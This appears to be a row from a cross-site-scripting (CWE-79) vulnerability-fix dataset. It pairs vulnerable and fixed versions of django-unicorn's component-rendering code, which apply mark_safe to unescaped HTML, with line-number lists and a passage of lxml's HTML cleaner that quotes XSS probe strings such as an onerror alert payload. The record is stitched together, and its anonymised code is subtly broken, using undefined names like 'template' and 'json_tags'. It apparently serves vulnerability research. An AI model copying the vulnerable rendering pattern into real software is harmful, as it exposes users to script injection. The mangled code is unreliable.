def get_root_element(soup: BeautifulSoup) -> Tag:
    """
    Return the first actual tag element in the parsed document.

    Args:
        soup: Parsed BeautifulSoup document.

    Returns:
        The first ``Tag`` child of the soup.

    Raises:
        Exception: If no tag element exists.
    """
    root = next(
        (node for node in soup.contents if isinstance(node, Tag) and node.name),
        None,
    )

    if root is None:
        raise Exception("No root element found")

    return root
| xss | {
"code": [
"from django.utils.safestring import mark_safe",
" rendered_template = mark_safe(rendered_template)"
],
"line_no": [
4,
118
]
} | {
"code": [
"from bs4.dammit import EntitySubstitution",
" def __init__(self):",
" super().__init__(entity_substitution=EntitySubstitution.substitute_html)"
],
"line_no": [
7,
25,
26
]
} | import logging
from django.template.response import TemplateResponse
from django.utils.safestring import mark_safe
import orjson
from bs4 import BeautifulSoup
from bs4.element import Tag
from bs4.formatter import HTMLFormatter
from django_unicorn.utils import sanitize_html
from ..decorators import timed
from ..utils import generate_checksum
VAR_0 = logging.getLogger(__name__)
class CLASS_0(HTMLFormatter):
def FUNC_1(self, VAR_2: Tag):
for k, v in VAR_2.attrs.items():
yield k, v
class CLASS_1(TemplateResponse):
def __init__(
self,
VAR_3,
VAR_4,
VAR_5=None,
VAR_6=None,
VAR_7=None,
VAR_8=None,
VAR_9=None,
VAR_10=None,
VAR_11=False,
**VAR_12,
):
super().__init__(
VAR_3=template,
VAR_4=request,
VAR_5=context,
VAR_6=content_type,
VAR_7=status,
VAR_8=charset,
VAR_9=using,
)
self.component = VAR_10
self.init_js = VAR_11
@timed
def FUNC_2(self):
VAR_13 = super().render()
if not self.component or not self.component.component_id:
return VAR_13
VAR_14 = VAR_13.content.decode("utf-8")
VAR_15 = self.component.get_frontend_context_variables()
VAR_16 = orjson.loads(VAR_15)
VAR_17 = generate_checksum(orjson.dumps(VAR_16))
VAR_1 = BeautifulSoup(VAR_14, features="html.parser")
VAR_18 = FUNC_0(VAR_1)
VAR_18["unicorn:id"] = self.component.component_id
VAR_18["unicorn:name"] = self.component.component_name
VAR_18["unicorn:key"] = self.component.component_key
VAR_18["unicorn:checksum"] = VAR_17
VAR_19 = generate_checksum(CLASS_1._desoupify(VAR_1))
if self.init_js:
VAR_21 = {
"id": self.component.component_id,
"name": self.component.component_name,
"key": self.component.component_key,
"data": orjson.loads(VAR_15),
"calls": self.component.calls,
"hash": VAR_19,
}
VAR_21 = orjson.dumps(VAR_21).decode("utf-8")
VAR_22 = f"unicorn:data:{self.component.component_id}"
VAR_23 = f"Unicorn.componentInit(JSON.parse(document.getElementById('{VAR_22}').textContent));"
VAR_24 = VAR_1.new_tag("script")
VAR_24["type"] = "application/json"
VAR_24["id"] = VAR_22
VAR_24.string = sanitize_html(VAR_21)
if self.component.parent:
self.component._init_script = VAR_23
self.component._json_tag = VAR_24
else:
VAR_25 = []
json_tags.append(VAR_24)
for child in self.component.children:
VAR_23 = f"{VAR_23} {child._init_script}"
VAR_25.append(child._json_tag)
VAR_26 = VAR_1.new_tag("script")
VAR_26["type"] = "module"
VAR_26.string = f"if (typeof Unicorn === 'undefined') {{ console.error('Unicorn is missing. Do you need {{% load unicorn %}} or {{% unicorn_scripts %}}?') }} else {{ {VAR_23} }}"
VAR_18.insert_after(VAR_26)
for t in VAR_25:
VAR_18.insert_after(t)
VAR_20 = CLASS_1._desoupify(VAR_1)
VAR_20 = mark_safe(VAR_20)
self.component.rendered(VAR_20)
VAR_13.content = VAR_20
return VAR_13
@staticmethod
def FUNC_3(VAR_1):
VAR_1.smooth()
return VAR_1.encode(formatter=CLASS_0()).decode("utf-8")
def FUNC_0(VAR_1: BeautifulSoup) -> Tag:
for element in VAR_1.contents:
if isinstance(element, Tag) and element.name:
return element
raise Exception("No root element found")
| import logging
from django.template.response import TemplateResponse
import orjson
from bs4 import BeautifulSoup
from bs4.dammit import EntitySubstitution
from bs4.element import Tag
from bs4.formatter import HTMLFormatter
from django_unicorn.utils import sanitize_html
from ..decorators import timed
from ..utils import generate_checksum
VAR_0 = logging.getLogger(__name__)
class CLASS_0(HTMLFormatter):
def __init__(self):
super().__init__(entity_substitution=EntitySubstitution.substitute_html)
def FUNC_1(self, VAR_2: Tag):
for k, v in VAR_2.attrs.items():
yield k, v
class CLASS_1(TemplateResponse):
def __init__(
self,
VAR_3,
VAR_4,
VAR_5=None,
VAR_6=None,
VAR_7=None,
VAR_8=None,
VAR_9=None,
VAR_10=None,
VAR_11=False,
**VAR_12,
):
super().__init__(
VAR_3=template,
VAR_4=request,
VAR_5=context,
VAR_6=content_type,
VAR_7=status,
VAR_8=charset,
VAR_9=using,
)
self.component = VAR_10
self.init_js = VAR_11
@timed
def FUNC_2(self):
VAR_13 = super().render()
if not self.component or not self.component.component_id:
return VAR_13
VAR_14 = VAR_13.content.decode("utf-8")
VAR_15 = self.component.get_frontend_context_variables()
VAR_16 = orjson.loads(VAR_15)
VAR_17 = generate_checksum(orjson.dumps(VAR_16))
VAR_1 = BeautifulSoup(VAR_14, features="html.parser")
VAR_18 = FUNC_0(VAR_1)
VAR_18["unicorn:id"] = self.component.component_id
VAR_18["unicorn:name"] = self.component.component_name
VAR_18["unicorn:key"] = self.component.component_key
VAR_18["unicorn:checksum"] = VAR_17
VAR_19 = generate_checksum(CLASS_1._desoupify(VAR_1))
if self.init_js:
VAR_21 = {
"id": self.component.component_id,
"name": self.component.component_name,
"key": self.component.component_key,
"data": orjson.loads(VAR_15),
"calls": self.component.calls,
"hash": VAR_19,
}
VAR_21 = orjson.dumps(VAR_21).decode("utf-8")
VAR_22 = f"unicorn:data:{self.component.component_id}"
VAR_23 = f"Unicorn.componentInit(JSON.parse(document.getElementById('{VAR_22}').textContent));"
VAR_24 = VAR_1.new_tag("script")
VAR_24["type"] = "application/json"
VAR_24["id"] = VAR_22
VAR_24.string = sanitize_html(VAR_21)
if self.component.parent:
self.component._init_script = VAR_23
self.component._json_tag = VAR_24
else:
VAR_25 = []
json_tags.append(VAR_24)
for child in self.component.children:
VAR_23 = f"{VAR_23} {child._init_script}"
VAR_25.append(child._json_tag)
VAR_26 = VAR_1.new_tag("script")
VAR_26["type"] = "module"
VAR_26.string = f"if (typeof Unicorn === 'undefined') {{ console.error('Unicorn is missing. Do you need {{% load unicorn %}} or {{% unicorn_scripts %}}?') }} else {{ {VAR_23} }}"
VAR_18.insert_after(VAR_26)
for t in VAR_25:
VAR_18.insert_after(t)
VAR_20 = CLASS_1._desoupify(VAR_1)
self.component.rendered(VAR_20)
VAR_13.content = VAR_20
return VAR_13
@staticmethod
def FUNC_3(VAR_1):
VAR_1.smooth()
return VAR_1.encode(formatter=CLASS_0()).decode("utf-8")
def FUNC_0(VAR_1: BeautifulSoup) -> Tag:
for element in VAR_1.contents:
if isinstance(element, Tag) and element.name:
return element
raise Exception("No root element found")
| [
2,
5,
10,
12,
15,
16,
18,
19,
24,
28,
29,
53,
56,
60,
63,
65,
69,
76,
77,
79,
92,
97,
104,
108,
113,
116,
120,
122,
124,
129,
130,
134,
137,
143,
145,
21,
22,
23,
132,
133,
134,
135,
136,
137,
138,
139
] | [
2,
4,
10,
12,
15,
16,
18,
19,
24,
27,
31,
32,
56,
59,
63,
66,
68,
72,
79,
80,
82,
95,
100,
107,
111,
116,
119,
122,
124,
126,
131,
132,
136,
139,
145,
147,
21,
22,
23,
134,
135,
136,
137,
138,
139,
140,
141
] |
1CWE-79
| # cython: language_level=3str
"""A cleanup tool for HTML.
Removes unwanted tags and content. See the `Cleaner` class for
details.
"""
from __future__ import absolute_import
import copy
import re
import sys
try:
from urlparse import urlsplit
from urllib import unquote_plus
except ImportError:
# Python 3
from urllib.parse import urlsplit, unquote_plus
from lxml import etree
from lxml.html import defs
from lxml.html import fromstring, XHTML_NAMESPACE
from lxml.html import xhtml_to_html, _transform_result
try:
unichr
except NameError:
# Python 3
unichr = chr
try:
unicode
except NameError:
# Python 3
unicode = str
try:
basestring
except NameError:
basestring = (str, bytes)
__all__ = ['clean_html', 'clean', 'Cleaner', 'autolink', 'autolink_html',
'word_break', 'word_break_html']
# Look at http://code.sixapart.com/trac/livejournal/browser/trunk/cgi-bin/cleanhtml.pl
# Particularly the CSS cleaning; most of the tag cleaning is integrated now
# I have multiple kinds of schemes searched; but should schemes be
# whitelisted instead?
# max height?
# remove images? Also in CSS? background attribute?
# Some way to whitelist object, iframe, etc (e.g., if you want to
# allow *just* embedded YouTube movies)
# Log what was deleted and why?
# style="behavior: ..." might be bad in IE?
# Should we have something for just <meta http-equiv>? That's the worst of the
# metas.
# UTF-7 detections? Example:
# <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
# you don't always have to have the charset set, if the page has no charset
# and there's UTF7-like code in it.
# Look at these tests: http://htmlpurifier.org/live/smoketests/xssAttacks.php
# This is an IE-specific construct you can have in a stylesheet to
# run some Javascript:
_replace_css_javascript = re.compile(
r'expression\s*\(.*?\)', re.S|re.I).sub
# Do I have to worry about @\nimport?
_replace_css_import = re.compile(
r'@\s*import', re.I).sub
_looks_like_tag_content = re.compile(
r'</?[a-zA-Z]+|\son[a-zA-Z]+\s*=',
*((re.ASCII,) if sys.version_info[0] >= 3 else ())).search
# All kinds of schemes besides just javascript: that can cause
# execution:
_is_image_dataurl = re.compile(
r'^data:image/.+;base64', re.I).search
_is_possibly_malicious_scheme = re.compile(
r'(?:javascript|jscript|livescript|vbscript|data|about|mocha):',
re.I).search
def _is_javascript_scheme(s):
    """
    Return a truthy match when *s* uses a scheme that could execute code.

    Inline base64 image data: URLs are explicitly tolerated; any other
    potentially executable scheme (javascript:, vbscript:, data:, ...)
    is reported.
    """
    return None if _is_image_dataurl(s) else _is_possibly_malicious_scheme(s)
_substitute_whitespace = re.compile(r'[\s\x00-\x08\x0B\x0C\x0E-\x19]+').sub
# FIXME: should data: be blocked?
# FIXME: check against: http://msdn2.microsoft.com/en-us/library/ms537512.aspx
_conditional_comment_re = re.compile(
r'\[if[\s\n\r]+.*?][\s\n\r]*>', re.I|re.S)
_find_styled_elements = etree.XPath(
"descendant-or-self::*[@style]")
_find_external_links = etree.XPath(
("descendant-or-self::a [normalize-space(@href) and substring(normalize-space(@href),1,1) != '#'] |"
"descendant-or-self::x:a[normalize-space(@href) and substring(normalize-space(@href),1,1) != '#']"),
namespaces={'x':XHTML_NAMESPACE})
class Cleaner(object):
"""
Instances cleans the document of each of the possible offending
elements. The cleaning is controlled by attributes; you can
override attributes in a subclass, or set them in the constructor.
``scripts``:
Removes any ``<script>`` tags.
``javascript``:
Removes any Javascript, like an ``onclick`` attribute. Also removes stylesheets
as they could contain Javascript.
``comments``:
Removes any comments.
``style``:
Removes any style tags.
``inline_style``
Removes any style attributes. Defaults to the value of the ``style`` option.
``links``:
Removes any ``<link>`` tags
``meta``:
Removes any ``<meta>`` tags
``page_structure``:
Structural parts of a page: ``<head>``, ``<html>``, ``<title>``.
``processing_instructions``:
Removes any processing instructions.
``embedded``:
Removes any embedded objects (flash, iframes)
``frames``:
Removes any frame-related tags
``forms``:
Removes any form tags
``annoying_tags``:
Tags that aren't *wrong*, but are annoying. ``<blink>`` and ``<marquee>``
``remove_tags``:
A list of tags to remove. Only the tags will be removed,
their content will get pulled up into the parent tag.
``kill_tags``:
A list of tags to kill. Killing also removes the tag's content,
i.e. the whole subtree, not just the tag itself.
``allow_tags``:
A list of tags to include (default include all).
``remove_unknown_tags``:
Remove any tags that aren't standard parts of HTML.
``safe_attrs_only``:
If true, only include 'safe' attributes (specifically the list
from the feedparser HTML sanitisation web site).
``safe_attrs``:
A set of attribute names to override the default list of attributes
considered 'safe' (when safe_attrs_only=True).
``add_nofollow``:
If true, then any <a> tags will have ``rel="nofollow"`` added to them.
``host_whitelist``:
A list or set of hosts that you can use for embedded content
(for content like ``<object>``, ``<link rel="stylesheet">``, etc).
You can also implement/override the method
``allow_embedded_url(el, url)`` or ``allow_element(el)`` to
implement more complex rules for what can be embedded.
Anything that passes this test will be shown, regardless of
the value of (for instance) ``embedded``.
Note that this parameter might not work as intended if you do not
make the links absolute before doing the cleaning.
Note that you may also need to set ``whitelist_tags``.
``whitelist_tags``:
A set of tags that can be included with ``host_whitelist``.
The default is ``iframe`` and ``embed``; you may wish to
include other tags like ``script``, or you may want to
implement ``allow_embedded_url`` for more control. Set to None to
include all tags.
This modifies the document *in place*.
"""
scripts = True
javascript = True
comments = True
style = False
inline_style = None
links = True
meta = True
page_structure = True
processing_instructions = True
embedded = True
frames = True
forms = True
annoying_tags = True
remove_tags = None
allow_tags = None
kill_tags = None
remove_unknown_tags = True
safe_attrs_only = True
safe_attrs = defs.safe_attrs
add_nofollow = False
host_whitelist = ()
whitelist_tags = {'iframe', 'embed'}
def __init__(self, **kw):
    """
    Apply keyword overrides to the class-level cleaning options.

    Raises:
        TypeError: for a keyword that does not name a known option.
        ValueError: when both ``allow_tags`` and ``remove_unknown_tags``
            are requested.
    """
    _missing = object()
    for name, value in kw.items():
        default = getattr(self, name, _missing)
        # Real options default to None/True/False or a collection;
        # anything else (including a missing attribute) is not an option.
        is_option = (
            default is None or default is True or default is False
            or isinstance(default, (frozenset, set, tuple, list))
        )
        if not is_option:
            raise TypeError(
                "Unknown parameter: %s=%r" % (name, value))
        setattr(self, name, value)

    # inline_style mirrors style unless explicitly configured.
    if self.inline_style is None and 'inline_style' not in kw:
        self.inline_style = self.style

    if kw.get("allow_tags"):
        if kw.get("remove_unknown_tags"):
            raise ValueError("It does not make sense to pass in both "
                             "allow_tags and remove_unknown_tags")
        self.remove_unknown_tags = False
# Used to lookup the primary URL for a given tag that is up for
# removal:
_tag_link_attrs = dict(
script='src',
link='href',
# From: http://java.sun.com/j2se/1.4.2/docs/guide/misc/applet.html
# From what I can tell, both attributes can contain a link:
applet=['code', 'object'],
iframe='src',
embed='src',
layer='src',
# FIXME: there doesn't really seem like a general way to figure out what
# links an <object> tag uses; links often go in <param> tags with values
# that we don't really know. You'd have to have knowledge about specific
# kinds of plugins (probably keyed off classid), and match against those.
##object=?,
# FIXME: not looking at the action currently, because it is more complex
# than than -- if you keep the form, you should keep the form controls.
##form='action',
a='href',
)
def __call__(self, doc):
    """
    Clean *doc* in place according to the configured options.

    Accepts either an Element or an ElementTree (the root element is
    cleaned).  Stages run in a fixed order: normalization, attribute and
    Javascript scrubbing, tag kill/remove collection, then the
    allow-tags pass and optional rel="nofollow" tagging.
    """
    try:
        getroot = doc.getroot
    except AttributeError:
        pass  # Element instance
    else:
        doc = getroot()  # ElementTree instance, instead of an element
    # convert XHTML to HTML
    xhtml_to_html(doc)
    # Normalize a case that IE treats <image> like <img>, and that
    # can confuse either this step or later steps.
    for el in doc.iter('image'):
        el.tag = 'img'
    if not self.comments:
        # Of course, if we were going to kill comments anyway, we don't
        # need to worry about this
        self.kill_conditional_comments(doc)

    # kill = delete whole subtree; remove = unwrap tag, keep children;
    # allow = explicit keep-list (checked at the end).
    kill_tags = set(self.kill_tags or ())
    remove_tags = set(self.remove_tags or ())
    allow_tags = set(self.allow_tags or ())

    if self.scripts:
        kill_tags.add('script')
    if self.safe_attrs_only:
        safe_attrs = set(self.safe_attrs)
        for el in doc.iter(etree.Element):
            attrib = el.attrib
            for aname in attrib.keys():
                if aname not in safe_attrs:
                    del attrib[aname]
    if self.javascript:
        if not (self.safe_attrs_only and
                self.safe_attrs == defs.safe_attrs):
            # safe_attrs handles events attributes itself
            for el in doc.iter(etree.Element):
                attrib = el.attrib
                for aname in attrib.keys():
                    if aname.startswith('on'):
                        del attrib[aname]
        doc.rewrite_links(self._remove_javascript_link,
                          resolve_base_href=False)
        # If we're deleting style then we don't have to remove JS links
        # from styles, otherwise...
        if not self.inline_style:
            for el in _find_styled_elements(doc):
                old = el.get('style')
                new = _replace_css_javascript('', old)
                new = _replace_css_import('', new)
                if self._has_sneaky_javascript(new):
                    # Something tricky is going on...
                    del el.attrib['style']
                elif new != old:
                    el.set('style', new)
        if not self.style:
            for el in list(doc.iter('style')):
                if el.get('type', '').lower().strip() == 'text/javascript':
                    el.drop_tree()
                    continue
                old = el.text or ''
                new = _replace_css_javascript('', old)
                # The imported CSS can do anything; we just can't allow:
                new = _replace_css_import('', new)
                if self._has_sneaky_javascript(new):
                    # Something tricky is going on...
                    el.text = '/* deleted */'
                elif new != old:
                    el.text = new
    if self.comments:
        kill_tags.add(etree.Comment)
    if self.processing_instructions:
        kill_tags.add(etree.ProcessingInstruction)
    if self.style:
        kill_tags.add('style')
    if self.inline_style:
        etree.strip_attributes(doc, 'style')
    if self.links:
        kill_tags.add('link')
    elif self.style or self.javascript:
        # We must get rid of included stylesheets if Javascript is not
        # allowed, as you can put Javascript in them
        for el in list(doc.iter('link')):
            if 'stylesheet' in el.get('rel', '').lower():
                # Note this kills alternate stylesheets as well
                if not self.allow_element(el):
                    el.drop_tree()
    if self.meta:
        kill_tags.add('meta')
    if self.page_structure:
        remove_tags.update(('head', 'html', 'title'))
    if self.embedded:
        # FIXME: is <layer> really embedded?
        # We should get rid of any <param> tags not inside <applet>;
        # These are not really valid anyway.
        for el in list(doc.iter('param')):
            parent = el.getparent()
            while parent is not None and parent.tag not in ('applet', 'object'):
                parent = parent.getparent()
            if parent is None:
                el.drop_tree()
        kill_tags.update(('applet',))
        # The alternate contents that are in an iframe are a good fallback:
        remove_tags.update(('iframe', 'embed', 'layer', 'object', 'param'))
    if self.frames:
        # FIXME: ideally we should look at the frame links, but
        # generally frames don't mix properly with an HTML
        # fragment anyway.
        kill_tags.update(defs.frame_tags)
    if self.forms:
        remove_tags.add('form')
        kill_tags.update(('button', 'input', 'select', 'textarea'))
    if self.annoying_tags:
        remove_tags.update(('blink', 'marquee'))

    # Single pass to collect doomed elements; allow_element() lets the
    # host whitelist rescue individual embeds.
    _remove = []
    _kill = []
    for el in doc.iter():
        if el.tag in kill_tags:
            if self.allow_element(el):
                continue
            _kill.append(el)
        elif el.tag in remove_tags:
            if self.allow_element(el):
                continue
            _remove.append(el)

    if _remove and _remove[0] == doc:
        # We have to drop the parent-most tag, which we can't
        # do.  Instead we'll rewrite it:
        el = _remove.pop(0)
        el.tag = 'div'
        el.attrib.clear()
    elif _kill and _kill[0] == doc:
        # We have to drop the parent-most element, which we can't
        # do.  Instead we'll clear it:
        el = _kill.pop(0)
        if el.tag != 'html':
            el.tag = 'div'
        el.clear()
    _kill.reverse()  # start with innermost tags
    for el in _kill:
        el.drop_tree()
    for el in _remove:
        el.drop_tag()

    if self.remove_unknown_tags:
        if allow_tags:
            raise ValueError(
                "It does not make sense to pass in both allow_tags and remove_unknown_tags")
        allow_tags = set(defs.tags)
    if allow_tags:
        # make sure we do not remove comments/PIs if users want them (which is rare enough)
        if not self.comments:
            allow_tags.add(etree.Comment)
        if not self.processing_instructions:
            allow_tags.add(etree.ProcessingInstruction)

        bad = []
        for el in doc.iter():
            if el.tag not in allow_tags:
                bad.append(el)
        if bad:
            if bad[0] is doc:
                el = bad.pop(0)
                el.tag = 'div'
                el.attrib.clear()
            for el in bad:
                el.drop_tag()
    if self.add_nofollow:
        for el in _find_external_links(doc):
            if not self.allow_follow(el):
                rel = el.get('rel')
                if rel:
                    if ('nofollow' in rel
                            and ' nofollow ' in (' %s ' % rel)):
                        continue
                    rel = '%s nofollow' % rel
                else:
                    rel = 'nofollow'
                el.set('rel', rel)
def allow_follow(self, anchor):
    """
    Hook for subclasses: return True to leave *anchor* without
    ``rel="nofollow"``.  The default never suppresses it.
    """
    return False
def allow_element(self, el):
    """
    Decide whether an element is configured to be accepted or rejected.

    :param el: an element.
    :return: true to accept the element or false to reject/discard it.
    """
    attr = self._tag_link_attrs.get(el.tag)
    if attr is None:
        return False

    # Some tags (e.g. <applet>) can carry a link in several attributes;
    # every one of them must be present and individually allowed.
    attrs = attr if isinstance(attr, (list, tuple)) else [attr]
    urls = [el.get(one_attr) for one_attr in attrs]
    if not all(urls):
        return False
    return all(self.allow_embedded_url(el, url) for url in urls)
def allow_embedded_url(self, el, url):
    """
    Decide whether a URL found on *el* may be kept.

    Only http(s) URLs on a whitelisted host are accepted, and only on
    tags listed in ``whitelist_tags`` (when that is not None).

    :param el: an element.
    :param url: a URL found on the element.
    :return: true to accept the URL and false to reject it.
    """
    if self.whitelist_tags is not None and el.tag not in self.whitelist_tags:
        return False

    scheme, netloc = urlsplit(url)[:2]
    # Strip any :port before comparing against the whitelist.
    host = netloc.lower().split(':', 1)[0]
    return scheme in ('http', 'https') and host in self.host_whitelist
def kill_conditional_comments(self, doc):
    """
    Remove IE conditional comments (``<!--[if ...]> ... <![endif]-->``).

    These can smuggle markup past the parser, so any comment that even
    looks conditional is dropped.
    """
    is_conditional = _conditional_comment_re.search
    self._kill_elements(
        doc, lambda el: is_conditional(el.text), etree.Comment)
def _kill_elements(self, doc, condition, iterate=None):
    """Drop the subtree of every element matching *condition*."""
    # Collect first, then drop: removing while iterating would skip nodes.
    doomed = [el for el in doc.iter(iterate) if condition(el)]
    for el in doomed:
        el.drop_tree()
def _remove_javascript_link(self, link):
    """Return ``''`` for links whose scheme could execute script, else *link*."""
    # Collapse whitespace/control characters first: "j a v a s c r i p t:"
    # style obfuscation might be interpreted in IE.
    normalized = _substitute_whitespace('', unquote_plus(link))
    if _is_javascript_scheme(normalized):
        # FIXME: should this be None to delete?
        return ''
    return link
# Strips CSS comments so "expre/* x */ssion" collapses before token checks.
_substitute_comments = re.compile(r'/\*.*?\*/', re.S).sub

def _has_sneaky_javascript(self, style):
    """
    Depending on the browser, stuff like ``e x p r e s s i o n(...)``
    can get interpreted, or ``expre/* stuff */ssion(...)``.  This
    checks for attempt to do stuff like this.

    Typically the response will be to kill the entire style; if you
    have just a bit of Javascript in the style another rule will catch
    that and remove only the Javascript from the style; this catches
    more sneaky attempts.
    """
    # Remove comments, backslash escapes and all whitespace so obfuscated
    # tokens line up for the simple substring checks below.
    style = self._substitute_comments('', style)
    style = style.replace('\\', '')
    style = _substitute_whitespace('', style)
    style = style.lower()
    if 'javascript:' in style:
        return True
    if 'expression(' in style:
        return True
    if '@import' in style:
        return True
    if '</noscript' in style:
        # e.g. '<noscript><style><a title="</noscript><img src=x onerror=alert(1)>">'
        return True
    if _looks_like_tag_content(style):
        # e.g. '<math><style><img src=x onerror=alert(1)></style></math>'
        return True
    return False
def clean_html(self, html):
    """Clean *html* (markup string or parsed document) and return the same type."""
    result_type = type(html)
    if isinstance(html, basestring):
        doc = fromstring(html)
    else:
        # Work on a copy so the caller's document is left untouched.
        doc = copy.deepcopy(html)
    self(doc)
    return _transform_result(result_type, doc)
# Module-level convenience: a Cleaner with all default options, and a
# clean_html() shortcut bound to it.
clean = Cleaner()
clean_html = clean.clean_html
############################################################
## Autolinking
############################################################
_link_regexes = [
re.compile(r'(?P<body>https?://(?P<host>[a-z0-9._-]+)(?:/[/\-_.,a-z0-9%&?;=~]*)?(?:\([/\-_.,a-z0-9%&?;=~]*\))?)', re.I),
# This is conservative, but autolinking can be a bit conservative:
re.compile(r'mailto:(?P<body>[a-z0-9._-]+@(?P<host>[a-z0-9_.-]+[a-z]))', re.I),
]
_avoid_elements = ['textarea', 'pre', 'code', 'head', 'select', 'a']
_avoid_hosts = [
re.compile(r'^localhost', re.I),
re.compile(r'\bexample\.(?:com|org|net)$', re.I),
re.compile(r'^127\.0\.0\.1$'),
]
_avoid_classes = ['nolink']
def autolink(el, link_regexes=_link_regexes,
             avoid_elements=_avoid_elements,
             avoid_hosts=_avoid_hosts,
             avoid_classes=_avoid_classes):
    """
    Turn any URLs into links.

    It will search for links identified by the given regular
    expressions (by default mailto and http(s) links).

    It won't link text in an element in avoid_elements, or an element
    with a class in avoid_classes.  It won't link to anything with a
    host that matches one of the regular expressions in avoid_hosts
    (default localhost and 127.0.0.1).

    If you pass in an element, the element's tail will not be
    substituted, only the contents of the element.
    """
    if el.tag in avoid_elements:
        return
    class_name = el.get('class')
    if class_name:
        class_name = class_name.split()
        for match_class in avoid_classes:
            if match_class in class_name:
                return
    # Recurse into children first; list() snapshots them because
    # linkifying a tail splices new <a> siblings into el.
    for child in list(el):
        autolink(child, link_regexes=link_regexes,
                 avoid_elements=avoid_elements,
                 avoid_hosts=avoid_hosts,
                 avoid_classes=avoid_classes)
        if child.tail:
            text, tail_children = _link_text(
                child.tail, link_regexes, avoid_hosts, factory=el.makeelement)
            if tail_children:
                # Leading plain text stays as the tail; generated anchors
                # are inserted immediately after the child.
                child.tail = text
                index = el.index(child)
                el[index+1:index+1] = tail_children
    if el.text:
        text, pre_children = _link_text(
            el.text, link_regexes, avoid_hosts, factory=el.makeelement)
        if pre_children:
            el.text = text
            el[:0] = pre_children
def _link_text(text, link_regexes, avoid_hosts, factory):
    """
    Split *text* into leading plain text plus a list of <a> elements.

    Each anchor's ``.text`` is the link body and its ``.tail`` carries
    the plain text up to the next match (the last anchor's tail is the
    trailing text).  Matches whose ``host`` group matches an
    *avoid_hosts* pattern are skipped.  *factory* builds elements
    (normally ``el.makeelement``).
    """
    leading_text = ''
    links = []
    last_pos = 0
    while 1:
        best_match, best_pos = None, None
        for regex in link_regexes:
            regex_pos = last_pos
            # Skip past matches on avoided hosts; the for/else falls out
            # once a usable match (or no match) is found.
            while 1:
                match = regex.search(text, pos=regex_pos)
                if match is None:
                    break
                host = match.group('host')
                for host_regex in avoid_hosts:
                    if host_regex.search(host):
                        regex_pos = match.end()
                        break
                else:
                    break
            if match is None:
                continue
            # Keep the earliest match across all regexes.
            if best_pos is None or match.start() < best_pos:
                best_match = match
                best_pos = match.start()
        if best_match is None:
            # No more matches
            if links:
                assert not links[-1].tail
                links[-1].tail = text
            else:
                assert not leading_text
                leading_text = text
            break
        link = best_match.group(0)
        end = best_match.end()
        if link.endswith('.') or link.endswith(','):
            # These punctuation marks shouldn't end a link
            end -= 1
            link = link[:-1]
        prev_text = text[:best_match.start()]
        if links:
            assert not links[-1].tail
            links[-1].tail = prev_text
        else:
            assert not leading_text
            leading_text = prev_text
        anchor = factory('a')
        anchor.set('href', link)
        body = best_match.group('body')
        if not body:
            body = link
        if body.endswith('.') or body.endswith(','):
            body = body[:-1]
        anchor.text = body
        links.append(anchor)
        # Continue scanning after this match.
        text = text[end:]
    return leading_text, links
def autolink_html(html, *args, **kw):
    if isinstance(html, basestring):
        doc = fromstring(html)
    else:
        # Copy so the caller's parsed document is not mutated.
        doc = copy.deepcopy(html)
    autolink(doc, *args, **kw)
    return _transform_result(type(html), doc)

autolink_html.__doc__ = autolink.__doc__
############################################################
## Word wrapping
############################################################
_avoid_word_break_elements = ['pre', 'textarea', 'code']
_avoid_word_break_classes = ['nobreak']
def word_break(el, max_width=40,
               avoid_elements=_avoid_word_break_elements,
               avoid_classes=_avoid_word_break_classes,
               break_character=unichr(0x200b)):
    """
    Breaks any long words found in the body of the text (not attributes).

    Doesn't effect any of the tags in avoid_elements, by default
    ``<textarea>`` and ``<pre>``

    Breaks words by inserting ​, which is a unicode character
    for Zero Width Space character.  This generally takes up no space
    in rendering, but does copy as a space, and in monospace contexts
    usually takes up space.

    See http://www.cs.tut.fi/~jkorpela/html/nobr.html for a discussion

    :param el: element whose text (and descendants' text) is processed.
    :param max_width: longest word length allowed before breaking.
    :param avoid_elements: tag names whose subtree is left untouched.
    :param avoid_classes: class names whose subtree is left untouched.
    :param break_character: character inserted at break points.
    """
    # Character suggestion of ​ comes from:
    # http://www.cs.tut.fi/~jkorpela/html/nobr.html
    # Fix: honor the avoid_elements argument; previously the module-level
    # default list was consulted unconditionally, silently ignoring the
    # caller's parameter.
    if el.tag in avoid_elements:
        return
    class_name = el.get('class')
    if class_name:
        dont_break = False
        class_name = class_name.split()
        for avoid in avoid_classes:
            if avoid in class_name:
                dont_break = True
                break
        if dont_break:
            return
    if el.text:
        el.text = _break_text(el.text, max_width, break_character)
    for child in el:
        word_break(child, max_width=max_width,
                   avoid_elements=avoid_elements,
                   avoid_classes=avoid_classes,
                   break_character=break_character)
        if child.tail:
            child.tail = _break_text(child.tail, max_width, break_character)
def word_break_html(html, *args, **kw):
    """Parse *html*, soft-break its long words, and return the input's type."""
    parsed = fromstring(html)
    word_break(parsed, *args, **kw)
    return _transform_result(type(html), parsed)
def _break_text(text, max_width, break_character):
    """Return *text* with every over-long whitespace-separated word broken."""
    for word in text.split():
        if len(word) > max_width:
            text = text.replace(word, _insert_break(word, max_width, break_character))
    return text
_break_prefer_re = re.compile(r'[^a-z]', re.I)
def _insert_break(word, width, break_character):
orig_word = word
result = ''
while len(word) > width:
start = word[:width]
breaks = list(_break_prefer_re.finditer(start))
if breaks:
last_break = breaks[-1]
# Only walk back up to 10 characters to find a nice break:
if last_break.end() > width-10:
# FIXME: should the break character be at the end of the
# chunk, or the beginning of the next chunk?
start = word[:last_break.end()]
result += start + break_character
word = word[len(start):]
result += word
return result
| # cython: language_level=3str
"""A cleanup tool for HTML.
Removes unwanted tags and content. See the `Cleaner` class for
details.
"""
from __future__ import absolute_import
import copy
import re
import sys
try:
from urlparse import urlsplit
from urllib import unquote_plus
except ImportError:
# Python 3
from urllib.parse import urlsplit, unquote_plus
from lxml import etree
from lxml.html import defs
from lxml.html import fromstring, XHTML_NAMESPACE
from lxml.html import xhtml_to_html, _transform_result
try:
unichr
except NameError:
# Python 3
unichr = chr
try:
unicode
except NameError:
# Python 3
unicode = str
try:
basestring
except NameError:
basestring = (str, bytes)
__all__ = ['clean_html', 'clean', 'Cleaner', 'autolink', 'autolink_html',
'word_break', 'word_break_html']
# Look at http://code.sixapart.com/trac/livejournal/browser/trunk/cgi-bin/cleanhtml.pl
# Particularly the CSS cleaning; most of the tag cleaning is integrated now
# I have multiple kinds of schemes searched; but should schemes be
# whitelisted instead?
# max height?
# remove images? Also in CSS? background attribute?
